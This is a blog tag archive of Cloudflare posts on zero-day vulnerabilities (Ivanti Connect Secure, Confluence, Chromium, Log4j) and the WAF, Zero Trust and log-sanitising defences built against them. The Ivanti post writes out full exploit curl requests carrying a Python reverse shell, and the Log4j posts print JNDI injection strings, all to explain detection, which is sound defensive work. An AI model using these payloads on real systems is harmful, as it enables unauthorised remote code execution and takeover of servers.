Tag Archives: Zero Day Threats

How Cloudflare’s AI WAF proactively detected the Ivanti Connect Secure critical zero-day vulnerability

Post Syndicated from Himanshu Anand http://blog.cloudflare.com/author/himanshu/ original https://blog.cloudflare.com/how-cloudflares-ai-waf-proactively-detected-ivanti-connect-secure-critical-zero-day-vulnerability

Most WAF providers rely on reactive methods, responding to vulnerabilities after they have been discovered and exploited. However, we believe in proactively addressing potential risks, and using AI to achieve this. Today we are sharing a recent example of a critical vulnerability (CVE-2023-46805 and CVE-2024-21887) and how Cloudflare’s Attack Score powered by AI, and Emergency Rules in the WAF have countered this threat.

The threat: CVE-2023-46805 and CVE-2024-21887

An authentication bypass (CVE-2023-46805) and a command injection vulnerability (CVE-2024-21887) impacting Ivanti products were recently disclosed and analyzed by AttackerKB. This vulnerability poses significant risks which could lead to unauthorized access and control over affected systems. In the following section we are going to discuss how this vulnerability can be exploited.

Technical analysis

As discussed in AttackerKB, the attacker can send a specially crafted request to the target system using a command like this:

curl -ik --path-as-is https://VICTIM/api/v1/totp/user-backup-code/../../license/keys-status/%3Bpython%20%2Dc%20%27import%20socket%2Csubprocess%3Bs%3Dsocket%2Esocket%28socket%2EAF%5FINET%2Csocket%2ESOCK%5FSTREAM%29%3Bs%2Econnect%28%28%22CONNECTBACKIP%22%2CCONNECTBACKPORT%29%29%3Bsubprocess%2Ecall%28%5B%22%2Fbin%2Fsh%22%2C%22%2Di%22%5D%2Cstdin%3Ds%2Efileno%28%29%2Cstdout%3Ds%2Efileno%28%29%2Cstderr%3Ds%2Efileno%28%29%29%27%3B

This command targets an endpoint (/license/keys-status/) that is usually protected by authentication. However, the attacker can bypass the authentication by manipulating the URL to include /api/v1/totp/user-backup-code/../../license/keys-status/. This technique is known as directory traversal.

The URL-encoded part of the command decodes to a Python reverse shell, which looks like this:

;python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("CONNECTBACKIP",CONNECTBACKPORT));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())';

The Python reverse shell is a way for the attacker to gain control over the target system.

The vulnerability exists in the way the system processes the node_name parameter. If an attacker can control the value of node_name, they can inject commands into the system.

To elaborate on ‘node_name’: The ‘node_name’ parameter is a component of the endpoint /api/v1/license/keys-status/path:node_name. This endpoint is where the issue primarily occurs.

The attacker can send a GET request to the URI path /api/v1/totp/user-backup-code/../../license/keys-status/;CMD; where CMD is any command they wish to execute. By using a semicolon, they can specify this command in the request. To ensure the command is correctly processed by the system, it must be URL-encoded.

Another code injection vulnerability was identified, as detailed in the blog post from AttackerKB. This time, it involves an authenticated command injection found in a different part of the system.

The same Python reverse shell payload used in the first command injection can be employed here, forming a JSON structure to trigger the vulnerability. Since the payload is in JSON, it doesn’t need to be URL-encoded:

    "type": ";python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"CONNECTBACKIP\",CONNECTBACKPORT));subprocess.call([\"/bin/sh\",\"-i\"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())';",
    "txtGCPProject": "a",
    "txtGCPSecret": "a",
    "txtGCPPath": "a",
    "txtGCPBucket": "a"

Although the /api/v1/system/maintenance/archiving/cloud-server-test-connection endpoint requires authentication, an attacker can bypass this by chaining it with the previously mentioned directory traversal vulnerability. They can construct an unauthenticated URI path /api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection to reach this endpoint and exploit the vulnerability.

To execute an unauthenticated operating system command, an attacker would use a curl request like this:

curl -ik --path-as-is https://VICTIM/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection -H 'Content-Type: application/json' --data-binary $'{ \"type\": \";python -c \'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"CONNECTBACKIP\\\",CONNECTBACKPORT));subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())\';\", \"txtGCPProject\":\"a\", \"txtGCPSecret\":\"a\", \"txtGCPPath\":\"a\", \"txtGCPBucket\":\"a\" }'

Cloudflare’s proactive defense

Cloudflare WAF is supported by an additional AI-powered layer called WAF Attack Score, which is built for the purpose of catching attack bypasses before they are even announced. Attack Score provides a score to indicate if the request is malicious or not; focusing on three main categories until now: XSS, SQLi, and some RCE variations (Command Injection, ApacheLog4J, etc.). The score ranges from 1 to 99 and the lower the score the more malicious the request is. Generally speaking, any request with a score below 20 is considered malicious.

Looking at the results of the exploitation example above of CVE-2023-46805 and CVE-2024-21887 using Cloudflare’s dashboard (Security > Events). Attack Score analysis results consist of three individual scores, each labeled to indicate their relevance to a specific attack category. There’s also a global score, “WAF Attack Score”, which considers the combined impact of these three scores. In some cases, the global score is affected by one of the sub-scores if the attack matches a category, here we can see the dominant sub-score is Remote Code Execution “WAF RCE Attack Score”.

Similarly, for the unauthenticated operating system command request, we received “WAF Attack Score: 19” from the AI model which also lies under the malicious request category. Worth mentioning the example scores are not fixed numbers and may vary based on the incoming attack variation.

The great news here is: customers on Enterprise and Business plans with WAF attack score enabled, along with a rule to block low scores (e.g. cf.waf.score le 20) or (cf.waf.score.class eqattack“) for Business, were already shielded from potential vulnerability exploits that were tested so far even before the vulnerability was announced.

Emergency rule deployment

In response to this critical vulnerability, Cloudflare released Emergency Rules on January 17, 2024, Within 24 hours after the proof of concept went public. These rules are part of its Managed Rules for the WAF, specifically targeting the threats posed by CVE-2023-46805 and an additional vulnerability, CVE-2024-21887, also related to Ivanti products. The rules, named “Ivanti – Auth Bypass, Command Injection – CVE:CVE-2023-46805, CVE:CVE-2024-21887,” are developed to block attempts to exploit these vulnerabilities, providing an extra layer of security for Cloudflare users.

Since we deployed these rules, we have recorded a high level of activity. At the time of writing, the rule was triggered more than 180,000 times.

Rule ID Description Default Action
New Managed Rule…34ab53c5 Ivanti – Auth Bypass, Command Injection – CVE:CVE-2023-46805, CVE:CVE-2024-21887 Block
Legacy Managed Rule
Ivanti – Auth Bypass, Command Injection – CVE:CVE-2023-46805, CVE:CVE-2024-21887 Block

Implications and best practices

Cloudflare’s response to CVE-2023-46805 and CVE-2024-21887 underscores the importance of having robust security measures in place. Organizations using Cloudflare services, particularly the WAF, are advised to ensure that their systems are updated with the latest rules and configurations to maintain optimal protection. We also recommend customers to deploy rules using Attack Score to improve their security posture. If you want to learn more about Attack Score, contact your account team.


Cloudflare’s proactive approach to cybersecurity using AI to identify and stop attacks, exemplified by its response to CVE-2023-46805 and CVE-2024-21887, highlights how threats and attacks can be identified before they are made public and vulnerabilities disclosed. By continuously monitoring and rapidly responding to vulnerabilities, Cloudflare ensures that its clients remain secure in an increasingly complex digital landscape.

Announcing WAF Attack Score Lite and Security Analytics for business customers

Post Syndicated from Radwa Radwan original https://blog.cloudflare.com/waf-attack-score-for-business-plan/

Announcing WAF Attack Score Lite and Security Analytics for business customers

Announcing WAF Attack Score Lite and Security Analytics for business customers

In December 2022 we announced the general availability of the WAF Attack Score. The initial release was for our Enterprise customers, but we always had the belief that this product should be enabled for more users. Today we’re announcing “WAF Attack Score Lite” and “Security Analytics” for our Business plan customers.

Looking back on “What is WAF Attack Score and Security Analytics?”

Vulnerabilities on the Internet appear almost on a daily basis. The CVE (common vulnerabilities and exposures) program has a list with over 197,000 records to track disclosed vulnerabilities.

That makes it really hard for web application owners to harden and update their system regularly, especially when we talk about critical libraries and the exploitation damage that can happen in case of information leak. That’s why web application owners tend to use WAFs (Web Application Firewalls) to protect their online presence.

Most WAFs use signature-based detections, which are rules created based on specific attacks that we know about. The signature-based method is very fast, has a low rate of false positives (these are the requests that are categorized as attack when they are actually legitimate), and is very efficient with most of the attack categories we know. However, they sometimes have a blind spot when a new attack happens, often called zero-day attacks. As soon as a new vulnerability is found, our security analysts take fast action to stop it in a matter of hours and update the WAF Managed Rules, yet we want to protect our customers during this time as well.

This is the main reason Cloudflare created a complementary feature to the WAF managed rules: a smart machine learning layer to help detect unknown attacks, and protect customers even during the time gap until rules are updated.

Early detection + Powerful mitigation = Safer Internet

Announcing WAF Attack Score Lite and Security Analytics for business customers

The performance of any machine learning drastically depends on the data it was trained on. Our machine learning uses a supervised model that was trained over hundreds of millions of requests generated by WAF Managed Rules, data varies between clean and malicious, some were blended with fuzzy techniques to enable catching similar patterns as covered in our blog “Improving the accuracy of our machine learning WAF”. At the moment, there are three types of attacks our machine learning model is optimized to find: SQL Injection (SQLi), Cross Site Scripting (XSS), and a wide range of Remote Code Execution (RCE) attacks such as shell injection, PHP injection, Apache Struts type compromises, Apache log4j, and similar attacks that result in RCE.

And the reason why we started with them is based on Cloudflare’s Application Security Report. These categories represent more than 24% of the mitigated layer 7 attacks over the last year in our WAF, therefore more prone to exploitations.

In the full Enterprise WAF Attack Score version we offer more granularity on the attack categories and we provide scores for each class where they can be configured freely per domain.

WAF Attack Score Lite Features for Business Plan

WAF Attack Score Lite and the Security Analytics view offer three main functions:

1- Attack detection: This happens through inspecting every incoming HTTP request, bucketing or classifying the requests into 4 types: Attacks, Likely Attacks, Likely Clean and Clean. At the moment there are three types of attacks our machine learning model is optimized to find: SQL Injection (SQLi), Cross Site Scripting (XSS), and a wide range of Remote Code Execution (RCE) attacks.

2- Attack mitigation: The ability to create WAF Custom Rules or WAF Rate Limiting Rules to mitigate requests. We’re exposing a new field cf.waf.score.class that  has preset values: attack, likely_attack, likely_clean and clean. customers can use this field in rules expressions and apply needed actions.

Announcing WAF Attack Score Lite and Security Analytics for business customers

3- Visibility over your entire traffic: Security Analytics is a new dashboard currently in beta. It provides a comprehensive view across all your HTTP traffic, which displays all requests whether they match rules or not. Security Analytics is a great tool for investigating false negatives and hardening your security configurations. Security Events is still available in (Security > Events) and Security Analytics is available in a separate tab (Security > Analytics).

Announcing WAF Attack Score Lite and Security Analytics for business customers

Deployment and configuration

In order to enable WAF Attack Score Lite and Security Analytics, you don’t need to take any action. The HTTP machine learning inspection rollout will start today, and Security Analytics will appear automatically to all Business plan customers by the time the rollout is completed in the upcoming weeks.

It’s worth mentioning that having the detection on and viewing the attack analysis in Security Analytics does not mean you’re blocking traffic. It only offers insights and provides the freedom to create rules and mitigate the desired requests. Creating a rule to block or challenge bad traffic is needed to take effect.

A common use case

Consider an attacker executing an attack using automated web requests to manipulate or disrupt web applications. One of the best ways to identify this type of traffic and mitigate these requests is by combining bot score with WAF Attack Score.

1- Go to the Security Analytics dashboard under Security > Analytics. On the right-hand side the Attack Analysis indicates the attack class. In this case, I can select “Attack” to apply a single filter, or use the quick filters under Insights to propagate multiple filters at once. In addition to the attack class, I can also select the Bot “Automated” filter.

Announcing WAF Attack Score Lite and Security Analytics for business customers

2- After filtering, Security Analytics provides the capability of scrolling down to see the logs and validate the results:

Announcing WAF Attack Score Lite and Security Analytics for business customers

3- Once the selected requests are confirmed, I can select the Create WAF Custom Rules option which will direct me to the Security Events with the pre-assigned filters to deploy a rule. In this case, I want to challenge the requests matched by the rule:

Announcing WAF Attack Score Lite and Security Analytics for business customers

And voila! You have a new rule that challenges traffic matching any automated attack variation.

Next steps

We have been working hard to provide maximum security and visibility for all our customers. This is only one step on this road! We will keep adding more product-focused analytics, and providing additional security against unknown attacks. Try it out, create a rule, and don’t hesitate to contact our sales team if you need the full version of WAF Attack Score.

Cloudflare observations of Confluence zero day (CVE-2022-26134)

Post Syndicated from Vaibhav Singhal original https://blog.cloudflare.com/cloudflare-observations-of-confluence-zero-day-cve-2022-26134/

Cloudflare observations of Confluence zero day (CVE-2022-26134)

On 2022-06-02 at 20:00 UTC Attlasian released a Security Advisory relating to a remote code execution (RCE) vulnerability affecting Confluence Server and Confluence Data Center products. This post covers our current analysis of this vulnerability.

When we learned about the vulnerability, Cloudflare’s internal teams immediately engaged to ensure all our customers and our own infrastructure were protected:

  • Our Web Application Firewall (WAF) teams started work on our first mitigation rules that were deployed on 2022-06-02 at 23:38 UTC for all customers.
  • Our internal security team started reviewing our Confluence instances to ensure Cloudflare itself was not impacted.

What is the impact of this vulnerability?

According to Volexity, the vulnerability results in full unauthenticated RCE, allowing an attacker to fully take over the target application.

Active exploits of this vulnerability leverage command injections using specially crafted strings to load a malicious class file in memory, allowing attackers to subsequently plant a webshell on the target machine that they can interact with.

Once the vulnerability is exploited, attackers can implant additional malicious code such as Behinder; a custom webshell called noop.jsp, which replaces the legitimate noop.jsp file located at Confluence root>/confluence/noop.jsp; and another open source webshell called Chopper.

Our observations of exploit attempts in the wild

Once we learned of the vulnerability, we began reviewing  our WAF data to identify activity related to exploitation of the vulnerability. We identified requests matching potentially malicious payloads as early as 2022-05-26 00:33 UTC, indicating that knowledge of the exploit was realized by some attackers prior to the Atlassian security advisory.

Since our mitigation rules were put in place, we have seen a large spike in activity starting from 2022-06-03 10:30 UTC — a little more than 10 hours after the new WAF rules were first deployed. This large spike coincides with the increased awareness of the vulnerability and release of public proof of concepts. Attackers are actively scanning for vulnerable applications at time of writing.

Cloudflare observations of Confluence zero day (CVE-2022-26134)

Although we have seen valid attack payloads since 2022-05-26, many payloads that started matching our initial WAF mitigation rules once the advisory was released were not valid against this specific vulnerability. Examples provided below:

Cloudflare observations of Confluence zero day (CVE-2022-26134)

The activity above indicates that actors were using scanning tools to try and identify the attack vectors. Exact knowledge of how to exploit the vulnerability may have been consolidated amongst select attackers and may not have been widespread.

The decline in WAF rule matches in the graph above after 2022-06-03 23:00 UTC is due to us releasing improved WAF rules. The new, updated rules greatly improved accuracy, reducing the number of false positives, such as the examples above.

A valid malicious URL targeting a vulnerable Confluence application is shown below:

Cloudflare observations of Confluence zero day (CVE-2022-26134)

(Where $HOSTNAME is the host of the target application.)

The URL above will run the contents of the HTTP request post body eval(#parameters.data[0]). Normally this will be a script that will download a web shell to the local server allowing the attacker to run arbitrary code on demand.

Other example URLs, omitting the schema and hostname, include:

Cloudflare observations of Confluence zero day (CVE-2022-26134)

Some of the activity we are observing is indicative of malware campaigns and botnet behavior. It is important to note that given the payload structure, other WAF rules have also been effective at mitigating particular variations of the attack. These include rule PHP100011 and PLONE0002.

Cloudflare’s response to CVE-2022-26134

We have a defense-in-depth approach which uses Cloudflare to protect Cloudflare. We had  high confidence that we were not impacted by this vulnerability due to the security measures in place. We confirmed this by leveraging our detection and response capabilities to sweep all of our internal assets and logs for signs of attempted compromise.

The main actions we took in response to this incident were:

  1. Gathered as much information as possible about the attack.
  2. Engaged our WAF team to start working on mitigation rules for this CVE.
  3. Searched our logs for any signs of compromise.
  4. We searched the logs from our internal Confluence instances for any signs of attempted exploits. We supplemented our assessment with the pattern strings provided by Atlasian: “${“.
  5. Any matches were reviewed to find out if they could be actual exploits. We found no signs that our systems were targeted by actual exploits.
  6. As soon as the WAF team was confident of the quality of the new rules, we started deploying them to all our servers to start protecting our customers as soon as possible. As we also use the WAF for our internal systems, our Confluence instances are also protected by the new WAF rules.
  7. We scrutinized our Confluence servers for signs of compromise and the presence of malicious implants. No signs of compromise were detected.
  8. We deployed rules to our SIEM and monitoring systems to detect any new exploitation attempt against our Confluence instances.

How Cloudflare uses Confluence

Cloudflare uses Confluence internally as our main wiki platform. Many of our teams use Confluence as their main knowledge-sharing platform. Our internal instances are protected by Cloudflare Access. In previous blog posts, we described how we use Access to protect internal resources. This means that every request sent to our Confluence servers must be authenticated and validated in accordance with our Access policies. No unauthenticated access is allowed.

This allowed us to be confident that only Cloudflare users are able to submit requests to our Confluence instances, thus reducing the risk of external exploitation attempts.

What to do if you are using Confluence on-prem

If you are an Atlassian customer for their on-prem products, you should patch to their latest fixed versions. We advise the following actions:

  1. Add Cloudflare Access as an extra protection layer for all your websites. Easy-to-follow instructions to enable Cloudflare Access are available here.
  2. Enable a WAF that includes protection for CVE-2022-26134 in front of your Confluence instances. For more information on how to enable Cloudflare’s WAF and other security products, check here.
  3. Check the logs from your Confluence instances for signs of exploitation attempts. Look for the strings /wiki/ and ${ in the same request.
  4. Use forensic tools and check for signs of post-exploitation tools such as webshells or other malicious implants.

Indicators of compromise and attack

The following indicators are associated with activity observed in the wild by Cloudflare, as described above. These indicators can be searched for against logs to determine if there is compromise in the environment associated with the Confluence vulnerability.

Indicators of Compromise (IOC)

# Type Value Filename/Hash
1 File 50f4595d90173fbe8b85bd78a460375d8d5a869f1fef190f72ef993c73534276 Filename: 45.64.json
Malicious file associated with exploit
2 File b85c16a7a0826edbcddbd2c17078472169f8d9ecaa7209a2d3976264eb3da0cc Filename: 45.64.rar
Malicious file associated with exploit
3 File 90e3331f6dd780979d22f5eb339dadde3d9bcf51d8cb6bfdc40c43d147ecdc8c Filename: 45.640.txt
Malicious file associated with exploit
4 File 1905fc63a9490533dc4f854d47c7cb317a5f485218173892eafa31d7864e2043 Filename: 45.647.txt
Malicious file associated with exploit
5 File 5add63588480287d1aee01e8dd267340426df322fe7a33129d588415fd6551fc Filename: lan (perl script)
Malicious file associated with exploit
6 File 67c2bae1d5df19f5f1ac07f76adbb63d5163ec2564c4a8310e78bcb77d25c988 Filename: jui.sh
Malicious file associated with exploit
7 File 281a348223a517c9ca13f34a4454a6fdf835b9cb13d0eb3ce25a76097acbe3fb Filename: conf
Malicious file associated with exploit

Indicators of Attack (IOA)

# Type Value Hash
1 URL String ${ String used to craft malicious payload
2 URL String javax.script.ScriptEngineManager String indicative of ScriptEngine manager to craft malicious payloads

CVE-2022-1096: How Cloudflare Zero Trust provides protection from zero day browser vulnerabilities

Post Syndicated from Tim Obezuk original https://blog.cloudflare.com/cve-2022-1096-zero-trust-protection-from-zero-day-browser-vulnerabilities/

CVE-2022-1096: How Cloudflare Zero Trust provides protection from zero day browser vulnerabilities

CVE-2022-1096: How Cloudflare Zero Trust provides protection from zero day browser vulnerabilities

On Friday, March 25, 2022, Google published an emergency security update for all Chromium-based web browsers to patch a high severity vulnerability (CVE-2022-1096). At the time of writing, the specifics of the vulnerability are restricted until the majority of users have patched their local browsers.

It is important everyone takes a moment to update their local web browser. It’s one quick and easy action everyone can contribute to the cybersecurity posture of their team.

Even if everyone updated their browser straight away, this remains a reactive measure to a threat that existed before the update was available. Let’s explore how Cloudflare takes a proactive approach by mitigating the impact of zero day browser threats with our zero trust and remote browser isolation services. Cloudflare’s remote browser isolation service is built from the ground up to protect against zero day threats, and all remote browsers on our global network have already been patched.

How Cloudflare Zero Trust protects against browser zero day threats

Cloudflare Zero Trust applies a layered defense strategy to protect users from zero day threats while browsing the Internet:

  1. Cloudflare’s roaming client steers Internet traffic over an encrypted tunnel to a nearby Cloudflare data center for inspection and filtration.
  2. Cloudflare’s secure web gateway inspects and filters traffic based on our network intelligence, antivirus scanning and threat feeds. Requests to known malicious services are blocked and high risk or unknown traffic is automatically served by a remote browser.
  3. Cloudflare’s browser isolation service executes all website code in a remote browser to protect unpatched devices from threats inside the unknown website.
CVE-2022-1096: How Cloudflare Zero Trust provides protection from zero day browser vulnerabilities

Protection from the unknown

Zero day threats are often exploited and exist undetected in the real world and actively target users through risky links in emails or other external communication points such as customer support tickets. This risk cannot be eliminated, but it can be reduced by using remote browser isolation to minimize the attack surface. Cloudflare’s browser isolation service is built from the ground up to protect against zero day threats:

  • Prevent compromised web pages from affecting the endpoint device by executing all web code in a remote browser that is physically isolated from the endpoint device. The endpoint device only receives a thin HTML5 remoting shell from our network and vector draw commands from the remote browser.
  • Mitigate the impact of compromise by automatically destroying and reconstructing remote browsers back to a known clean state at the end of their browser session.
  • Protect adjacent remote browsers by encrypting all remote browser egress traffic, segmenting remote browsers with virtualization technologies and distributing browsers across physical hardware in our global network.
  • Aiding Security Incident Response (SIRT) teams by logging all remote egress traffic in the integrated secure web gateway logs.

Patching remote browsers around the world

Even with all these security controls in place, patching browsers remains critical to eliminate the risk of compromise. The process of patching local and remote browsers tells two different stories that can be the difference between compromise, and avoiding a zero day vulnerability.

Patching your workforces local browsers requires politely asking users to interrupt their work to update their browser, or apply mobile device management techniques to disrupt their work by forcing an update. Neither of these options create happy users, or deliver rapid mitigation.

Patching remote browsers is a fundamentally different process. Since the remote browser itself is running on our network, Users and Administrators do not need to intervene as security patches are automatically deployed to remote browsers on Cloudflare’s network. Then without a user restarting their local browser, any traffic to an isolated website is automatically served from a patched remote browser.

Finally, browser based vulnerabilities such as CVE-2022-1096 are not uncommon. With over 300 in 2021 and over 40 already in 2022 (according to cvedetails.com) it is critical for administrators to have a plan to rapidly mitigate and patch browsers in their organization.

Get started with Cloudflare Browser Isolation

Cloudflare Browser Isolation is available to both self serve and enterprise customers. Whether you’re a small startup or a massive enterprise, our network is ready to serve fast and secure remote browsing for your team, no matter where they are based.

To get started, visit our website and, if you’re interested in evaluating Browser Isolation, ask our team for a demo with our Clientless Web Isolation.

Sanitizing Cloudflare Logs to protect customers from the Log4j vulnerability

Post Syndicated from Jon Levine original https://blog.cloudflare.com/log4j-cloudflare-logs-mitigation/

Sanitizing Cloudflare Logs to protect customers from the Log4j vulnerability

On December 9, 2021, the world learned about CVE-2021-44228, a zero-day exploit affecting the Apache Log4j utility.  Cloudflare immediately updated our WAF to help protect against this vulnerability, but we recommend customers update their systems as quickly as possible.

However, we know that many Cloudflare customers consume their logs using software that uses Log4j, so we are also mitigating any exploits attempted via Cloudflare Logs. As of this writing, we are seeing the exploit pattern in logs we send to customers up to 1000 times every second.

Starting immediately, customers can update their Logpush jobs to automatically redact tokens that could trigger this vulnerability. You can read more about this in our developer docs or see details below.

How the attack works

You can read more about how the Log4j vulnerability works in our blog post here. In short, an attacker can add something like ${jndi:ldap://example.com/a} in any string. Log4j will then make a connection on the Internet to retrieve this object.

Cloudflare Logs contain many string fields that are controlled by end-users on the public Internet, such as User Agent and URL path. With this vulnerability, it is possible that a malicious user can cause a remote code execution on any system that reads these fields and uses an unpatched instance of Log4j.

Our mitigation plan

Unfortunately, just checking for a token like ${jndi:ldap is not sufficient to protect against this vulnerability. Because of the expressiveness of the templating language, it’s necessary to check for obfuscated variants as well. Already, we are seeing attackers in the wild use variations like ${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce}.  Thus, redacting the token ${ is the most general way to defend against this vulnerability.

The token ${ appears up to 1,000 times per second in the logs we currently send to customers. A spot check of some records shows that many of them are not attempts to exploit this vulnerability. Therefore we can’t safely redact our logs without impacting customers who may expect to see this token in their logs.

Starting now, customers can update their Logpush jobs to redact the string ${ and replace it with x{ everywhere.

To enable this, customers can update their Logpush job options configuration to include the parameter CVE-2021-44228=true. For detailed instructions on how to do this using the Logpush API, see our developer documentation.

Secure how your servers connect to the Internet today

Post Syndicated from Sam Rhea original https://blog.cloudflare.com/secure-how-your-servers-connect-to-the-internet-today/

Secure how your servers connect to the Internet todaySecure how your servers connect to the Internet today

The vulnerability disclosed yesterday in the Java-based logging package, log4j, allows attackers to execute code on a remote server. We’ve updated Cloudflare’s WAF to defend your infrastructure against this 0-day attack. The attack also relies on exploiting servers that are allowed unfettered connectivity to the public Internet. To help solve that challenge, your team can deploy Cloudflare One today to filter and log how your infrastructure connects to any destination.

Securing traffic inbound and outbound

You can read about the vulnerability in more detail in our analysis published earlier today, but the attack starts when an attacker adds a specific string to input that the server logs. Today’s updates to Cloudflare’s WAF block that malicious string from being sent to your servers. We still strongly recommend that you patch your instances of log4j immediately to prevent lateral movement.

If the string has already been logged, the vulnerability compromises servers by tricking them into sending a request to a malicious LDAP server. The destination of the malicious server could be any arbitrary URL. Attackers who control that URL can then respond to the request with arbitrary code that the server can execute.

At the time of this blog, it does not appear any consistent patterns of malicious hostnames exist like those analyzed in the SUNBURST attack. However, any server or network with unrestricted connectivity to the public Internet is a risk for this specific vulnerability and others that rely on exploiting that open window.

First, filter and log DNS queries with two-clicks

From what we’re observing in early reports, the vulnerability mostly relies on connectivity to IP addresses. Cloudflare’s network firewall, the second step in this blog, focuses on that level of security. However, your team can adopt a defense-in-depth strategy by deploying Cloudflare’s protective DNS resolver today to apply DNS filtering to add security and visibility in minutes to any servers that need to communicate out to the Internet.

If you configure Cloudflare Gateway as the DNS resolver for those servers, any DNS query they make to find the IP address of a given host, malicious or not, will be sent to a nearby Cloudflare data center first. Cloudflare runs the world’s fastest DNS resolver so that you don’t have to compromise performance for this level of added safety and logging. When that query arrives, Cloudflare’s network can then:

  • filter your DNS queries to block the resolution of queries made to known malicious destinations, and
  • log every query if you need to investigate and audit after potential events.
Secure how your servers connect to the Internet today

Alternatively, if you know every host that your servers need to connect to, you can create a positive security model with Cloudflare Gateway. In this model, your resource can only send DNS queries to the domains that you provide. Queries to any other destinations, including new and arbitrary ones like those that could be part of this attack, will be blocked by default.

> Ready to get started today? You can begin filtering and logging all of the DNS queries made by your servers or your entire network with these instructions here.

Second, secure network traffic leaving your infrastructure

Protective DNS filtering can add security and visibility in minutes, but bad actors can target all of the other ways that your servers communicate out to the rest of the Internet. Historically, organizations deployed network firewalls in their data centers to filter the traffic entering and exiting their network. Their teams ran capacity planning exercises, purchased the appliances, and deployed hardware. Some of these appliances eventually moved to the cloud, but the pain of deployment stayed mostly the same.

Cloudflare One’s network firewall helps your team secure all of your network’s traffic through a single, cloud-native, solution that does not require that you need to manage any hardware or any virtual appliances. Deploying this level of security only requires that you decide how you want to send traffic to Cloudflare. You can connect your network through multiple on-ramp options, including network layer (GRE or IPsec tunnels), direct connections, and a device client.

Secure how your servers connect to the Internet today

Once connected, traffic leaving your network will first route through a Cloudflare data center. Cloudflare’s network will apply filters at layers 3 through 5 of the OSI model. Your administrators can then create policies based on IP, port, protocol in both stateless and stateful options. If you want to save even more time, Cloudflare uses the data we have about threats on the Internet to create managed lists for you that you can block with a single click.

Similar to DNS queries, if you know that your servers and services in your network only need to reach specific IPs or ports, you can build a positive security model with allow-list rules that restrict connections and traffic to just the destinations you specify. In either model, Cloudflare’s network will handle logging for you. Your team can export these logs to your SIEM for audit retention or additional analysis if you need to investigate a potential attack.

> Ready to get started securing your network? Follow the guide here and tell us you’d like to get started and we’ll be ready to help your team.

Third, inspect and filter HTTP traffic

Some attacks will rely on convincing your servers and endpoints to send HTTP requests to specific destinations, leaking data or grabbing malware to download in your infrastructure. To help solve that challenge, you can layer HTTP inspection, virus scanning, and logging in Cloudflare’s network.

If you completed Step Two above, you can use the same on-ramp that you configured to upgrade UPD and TCP traffic where Cloudflare’s Secure Web Gateway can apply HTTP filtering and logging to the requests leaving your network. If you need more granular control, you can deploy Cloudflare’s client software to build rules that only apply to specific endpoints in your infrastructure.

Like every other layer in this security model, you can also only allow your servers to connect to an approved list of destinations. Cloudflare’s Secure Web Gateway will allow and log those requests and block attempts to reach any other destinations.

Secure how your servers connect to the Internet today

> Ready to begin inspecting and filtering HTTP traffic? Follow the instructions here to get started today.

What’s next?

Deploying filtering and logging today will help protect against the next attack or attempts to continue to exploit today’s vulnerability, but we’re encouraging everyone to start by patching your deployments of log4j immediately.

As we write this, we’re updating existing managed rulesets to include reports of destinations used to attempt to exploit today’s vulnerability. We’ll continue to update those policies as we learn more information.

Inside the log4j2 vulnerability (CVE-2021-44228)

Post Syndicated from John Graham-Cumming original https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/

Inside the log4j2 vulnerability (CVE-2021-44228)

Yesterday, December 9, 2021, a very serious vulnerability in the popular Java-based logging package log4j was disclosed. This vulnerability allows an attacker to execute code on a remote server; a so-called Remote Code Execution (RCE). Because of the widespread use of Java and log4j this is likely one of the most serious vulnerabilities on the Internet since both Heartbleed and ShellShock.

It is CVE-2021-44228 and affects version 2 of log4j between versions 2.0-beta-9 and 2.14.1. It is not present in version 1 of log4j and is patched in 2.15.

In this post we explain the history of this vulnerability, how it was introduced, how Cloudflare is protecting our clients. We will update later with actual attempted exploitation we are seeing blocked by our firewall service.

Cloudflare uses some Java-based software and our teams worked to ensure that our systems were not vulnerable or that this vulnerability was mitigated. In parallel, we rolled out firewall rules to protect our customers.

But, if you work for a company that is using Java-based software that uses log4j you should immediately read the section on how to mitigate and protect your systems before reading the rest.

How to Mitigate CVE-2021-44228

To mitigate the following options are available (see the advisory from Apache here):

1. Upgrade to log4j v2.15

2. If you are using log4j v2.10 or above, and cannot upgrade, then set the property


3. Or remove the JndiLookup class from the classpath. For example, you can run a command like

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

to remove the class from the log4j-core.

Vulnerability History

In 2013, in version 2.0-beta9, the log4j package added the “JNDILookup plugin” in issue LOG4J2-313. To understand how that change creates a problem, it’s necessary to understand a little about JNDI: Java Naming and Directory Interface.

JNDI has been present in Java since the late 1990s. It is a directory service that allows a Java program to find data (in the form of a Java object) through a directory. JNDI has a number of service provider interfaces (SPIs) that enable it to use a variety of directory services.

For example, SPIs exist for the CORBA COS (Common Object Service), the Java RMI (Remote Method Interface) Registry and LDAP. LDAP is a very popular directory service (the Lightweight Directory Access Protocol) and is the primary focus of CVE-2021-44228 (although other SPIs could potentially also be used).

A Java program can use JNDI and LDAP together to find a Java object containing data that it might need. For example, in the standard Java documentation there’s an example that talks to an LDAP server to retrieve attributes from an object. It uses the URL ldap://localhost:389/o=JNDITutorial to find the JNDITutorial object from an LDAP server running on the same machine (localhost) on port 389 and goes on to read attributes from it.

As the tutorial says “If your LDAP server is located on another machine or is using another port, then you need to edit the LDAP URL”. Thus the LDAP server could be running on a different machine and potentially anywhere on the Internet. That flexibility means that if an attacker could control the LDAP URL they’d be able to cause a Java program to load an object from a server under their control.

That’s the basics of JNDI and LDAP; a useful part of the Java ecosystem.

But in the case of log4j an attacker can control the LDAP URL by causing log4j to try to write a string like ${jndi:ldap://example.com/a}. If that happens then log4j will connect to the LDAP server at example.com and retrieve the object.

This happens because log4j contains special syntax in the form ${prefix:name} where prefix is one of a number of different Lookups where name should be evaluated. For example, ${java:version} is the current running version of Java.

